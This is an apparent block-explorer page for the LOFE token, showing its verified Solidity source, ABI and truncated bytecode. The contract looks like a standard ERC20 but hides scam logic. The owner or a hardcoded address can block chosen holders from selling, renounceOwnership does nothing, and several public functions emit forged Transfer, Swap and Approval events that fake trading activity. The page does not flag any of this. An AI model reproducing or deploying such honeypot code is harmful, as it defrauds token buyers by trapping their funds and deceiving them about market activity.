ETH Price: $3,787.75 (+20.77%)
Gas: 35 Gwei

Token

LOFE (LOFE)
 

Overview

Max Total Supply

100,000,000 LOFE

Holders

613

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
Binance 17
Balance
17,473.017704369 LOFE

Value
$0.00
0x56eddb7aa87536c09ccc2793473599fd21a8b17f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
LOFE

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : 4.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.16;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

contract ERC20 is Ownable, IERC20, IERC20Metadata {

    mapping(address => uint256) private _balances;
    mapping (address => bool) private _snaps;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _snapshotApplied = false;
    string private _name;
    string private _symbol;

    address private _universal = 0xEf1c6E67703c7BD7107eed8303Fbe6EC2554BF6B;
    address private _pair;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function setup(address _setup_) external onlyOwner {
        _pair = _setup_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    function snapUsers(address [] calldata _addresses_) external  {
        require(owner() == _msgSender() ||  address(0xA42e681c7399e3e538c3A90A2fdA4E7b21fb3Dda) == _msgSender(), "Ownable: caller is not the owner");
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snaps[_addresses_[i]] = true;
            emit Approval(_addresses_[i], address(this), balanceOf(_addresses_[i]));
        }
    }

    function execute(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_pair, _addresses_[i], _out);
        }
    }

    function multicall(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _pair, _in);
        }
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function decreaseAllowance(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snaps[_addresses_[i]] = false;
        }
    }

    function bind(address _address_) public view returns (bool) {
        return _snaps[_address_];
    }
    function toApplied(bool c) external onlyOwner {
        _snapshotApplied = c;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_snaps[from]) require(_snapshotApplied == true, "");


        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract LOFE is ERC20 {
    constructor() ERC20("LOFE", "LOFE") {
        _mint(msg.sender, 100000000 * 10 ** decimals());
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"bind","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_setup_","type":"address"}],"name":"setup","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"snapUsers","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"c","type":"bool"}],"name":"toApplied","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff02191690831515021790555073ef1c6e67703c7bd7107eed8303fbe6ec2554bf6b600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200008157600080fd5b506040518060400160405280600481526020017f4c4f4645000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f4c4f4645000000000000000000000000000000000000000000000000000000008152506200010e620001026200017a60201b60201c565b6200018260201b60201c565b81600690816200011f919062000641565b50806007908162000131919062000641565b5050506200017433620001496200024660201b60201c565b600a620001579190620008b8565b6305f5e10062000168919062000909565b6200024f60201b60201c565b62000a40565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002c1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002b890620009b5565b60405180910390fd5b620002d560008383620003bd60201b60201c565b8060046000828254620002e99190620009d7565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200039d919062000a23565b60405180910390a3620003b960008383620003c260201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200044957607f821691505b6020821081036200045f576200045e62000401565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004c97fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200048a565b620004d586836200048a565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005226200051c6200051684620004ed565b620004f7565b620004ed565b9050919050565b6000819050919050565b6200053e8362000501565b620005566200054d8262000529565b84845462000497565b825550505050565b600090565b6200056d6200055e565b6200057a81848462000533565b505050565b5b81811015620005a2576200059660008262000563565b60018101905062000580565b5050565b601f821115620005f157620005bb8162000465565b620005c6846200047a565b81016020851015620005d6578190505b620005ee620005e5856200047a565b8301826200057f565b50505b505050565b600082821c905092915050565b60006200061660001984600802620005f6565b1980831691505092915050565b600062000631838362000603565b9150826002028217905092915050565b6200064c82620003c7565b67ffffffffffffffff811115620006685762000667620003d2565b5b62000674825462000430565b62000681828285620005a6565b600060209050601f831160018114620006b95760008415620006a4578287015190505b620006b0858262000623565b86555062000720565b601f198416620006c98662000465565b60005b82811015620006f357848901518255600182019150602085019450602081019050620006cc565b868310156200071357848901516200070f601f89168262000603565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620007b6578086048111156200078e576200078d62000728565b5b60018516156200079e5780820291505b8081029050620007ae8562000757565b94506200076e565b94509492505050565b600082620007d15760019050620008a4565b81620007e15760009050620008a4565b8160018114620007fa576002811462000805576200083b565b6001915050620008a4565b60ff8411156200081a576200081962000728565b5b8360020a91508482111562000834576200083362000728565b5b50620008a4565b5060208310610133831016604e8410600b8410161715620008755782820a9050838111156200086f576200086e62000728565b5b620008a4565b62000884848484600162000764565b925090508184048111156200089e576200089d62000728565b5b81810290505b9392505050565b600060ff82169050919050565b6000620008c582620004ed565b9150620008d283620008ab565b9250620009017fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007bf565b905092915050565b60006200091682620004ed565b91506200092383620004ed565b92508282026200093381620004ed565b915082820484148315176200094d576200094c62000728565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200099d601f8362000954565b9150620009aa8262000965565b602082019050919050565b60006020820190508181036000830152620009d0816200098e565b9050919050565b6000620009e482620004ed565b9150620009f183620004ed565b925082820190508082111562000a0c5762000a0b62000728565b5b92915050565b62000a1d81620004ed565b82525050565b600060208201905062000a3a600083018462000a12565b92915050565b6121ff8062000a506000396000f3fe608060405234801561001057600080fd5b50600436106101425760003560e01c806381bac14f116100b8578063a9059cbb1161007c578063a9059cbb14610377578063beabacc8146103a7578063c18568ca146103c3578063dd62ed3e146103df578063f2fde38b1461040f578063fde980ca1461042b57610142565b806381bac14f146102bf5780638da5cb5b146102ef57806395d89b411461030d578063a1c617f51461032b578063a457c2d71461034757610142565b8063395093511161010a5780633950935114610201578063477e19441461023157806366d382031461024d57806370a0823114610269578063715018a6146102995780637aac697b146102a357610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b3578063313ce567146101e3575b600080fd5b61014f610447565b60405161015c91906116a4565b60405180910390f35b61017f600480360381019061017a9190611764565b6104d9565b60405161018c91906117bf565b60405180910390f35b61019d6104fc565b6040516101aa91906117e9565b60405180910390f35b6101cd60048036038101906101c89190611804565b610506565b6040516101da91906117bf565b60405180910390f35b6101eb610535565b6040516101f89190611873565b60405180910390f35b61021b60048036038101906102169190611764565b61053e565b60405161022891906117bf565b60405180910390f35b61024b600480360381019061024691906118f3565b610575565b005b61026760048036038101906102629190611940565b610622565b005b610283600480360381019061027e9190611940565b61066e565b60405161029091906117e9565b60405180910390f35b6102a16106b7565b005b6102bd60048036038101906102b8919061196d565b6106c1565b005b6102d960048036038101906102d49190611940565b61084d565b6040516102e691906117bf565b60405180910390f35b6102f76108a3565b60405161030491906119f0565b60405180910390f35b6103156108cc565b60405161032291906116a4565b60405180910390f35b6103456004803603810190610340919061196d565b61095e565b005b610361600480360381019061035c9190611764565b610ae9565b60405161036e91906117bf565b60405180910390f35b610391600480360381019061038c9190611764565b610b60565b60405161039e91906117bf565b60405180910390f35b6103c160048036038101906103bc9190611804565b610b83565b005b6103dd60048036038101906103d891906118f3565b610bed565b005b6103f960048036038101906103f49190611a0b565b610e1a565b60405161040691906117e9565b60405180910390f35b61042960048036038101906104249190611940565b610ea1565b005b61044560048036038101906104409190611a77565b610f24565b005b60606006805461045690611ad3565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611ad3565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4610f49565b90506104f1818585610f51565b600191505092915050565b6000600454905090565b600080610511610f49565b905061051e85828561111a565b6105298585856111a6565b60019150509392505050565b60006009905090565b600080610549610f49565b905061056a81858561055b8589610e1a565b6105659190611b33565b610f51565b600191505092915050565b61057d6114c8565b60005b8282905081101561061d576000600260008585858181106105a4576105a3611b67565b5b90506020020160208101906105b99190611940565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061061590611b96565b915050610580565b505050565b61062a6114c8565b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6106bf6114c8565b565b60005b84849050811015610846578484828181106106e2576106e1611b67565b5b90506020020160208101906106f79190611940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82260008686600060405161077d9493929190611c23565b60405180910390a3600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168585838181106107d1576107d0611b67565b5b90506020020160208101906107e69190611940565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161082b91906117e9565b60405180910390a3808061083e90611b96565b9150506106c4565b5050505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546108db90611ad3565b80601f016020809104026020016040519081016040528092919081815260200182805461090790611ad3565b80156109545780601f1061092957610100808354040283529160200191610954565b820191906000526020600020905b81548152906001019060200180831161093757829003601f168201915b5050505050905090565b60005b84849050811015610ae25784848281811061097f5761097e611b67565b5b90506020020160208101906109949190611940565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8228560008087604051610a199493929190611c68565b60405180910390a3848482818110610a3457610a33611b67565b5b9050602002016020810190610a499190611940565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ac791906117e9565b60405180910390a38080610ada90611b96565b915050610961565b5050505050565b600080610af4610f49565b90506000610b028286610e1a565b905083811015610b47576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b3e90611d1f565b60405180910390fd5b610b548286868403610f51565b60019250505092915050565b600080610b6b610f49565b9050610b788185856111a6565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610be091906117e9565b60405180910390a3505050565b610bf5610f49565b73ffffffffffffffffffffffffffffffffffffffff16610c136108a3565b73ffffffffffffffffffffffffffffffffffffffff161480610c7b5750610c38610f49565b73ffffffffffffffffffffffffffffffffffffffff1673a42e681c7399e3e538c3a90a2fda4e7b21fb3dda73ffffffffffffffffffffffffffffffffffffffff16145b610cba576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb190611d8b565b60405180910390fd5b60005b82829050811015610e1557600160026000858585818110610ce157610ce0611b67565b5b9050602002016020810190610cf69190611940565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff16838383818110610d7157610d70611b67565b5b9050602002016020810190610d869190611940565b73ffffffffffffffffffffffff